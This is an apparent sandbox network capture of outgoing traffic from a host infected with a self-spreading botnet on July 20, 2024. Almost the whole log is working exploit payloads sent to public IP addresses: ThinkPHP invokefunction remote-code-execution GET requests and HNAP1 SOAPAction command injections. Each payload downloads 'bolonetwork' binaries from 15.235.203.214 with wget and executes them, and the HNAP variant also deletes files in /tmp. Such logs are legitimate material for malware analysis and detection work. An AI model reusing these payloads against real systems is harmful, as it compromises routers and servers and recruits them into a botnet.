                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      127192.168.2.234497895.186.203.21280
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.870703936 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      128192.168.2.2338876101.167.238.798081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.873853922 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      129192.168.2.2355508129.66.19.48081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.877737999 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      130192.168.2.235368695.83.199.3780
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.879018068 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      131192.168.2.235843042.37.47.78081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.881367922 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      132192.168.2.2348288209.221.156.988081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.885301113 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      133192.168.2.233627295.77.163.11580
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.886684895 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      134192.168.2.2336372195.218.137.898081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.889092922 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      135192.168.2.2341118221.225.197.1718081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.893487930 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      136192.168.2.233302495.63.144.5780
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.895168066 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      137192.168.2.2354188116.5.187.78081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.897372961 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      138192.168.2.2337296130.192.156.1558081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.902003050 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      139192.168.2.235247695.132.68.18880
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.903431892 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      140192.168.2.235595886.189.116.2448081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.905756950 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      141192.168.2.235738868.41.70.2558081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.910978079 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 